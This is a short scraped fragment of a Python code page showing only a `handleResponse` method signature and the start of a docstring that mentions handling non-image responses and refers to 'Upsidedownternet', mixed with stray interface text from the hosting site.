def handleResponse(self, request, data):
|
||||
'''
|
||||
Handles all non-image responses by default. See Upsidedownternet
|
||||
|
|
Loading…
Add table
Add a link
Reference in a new issue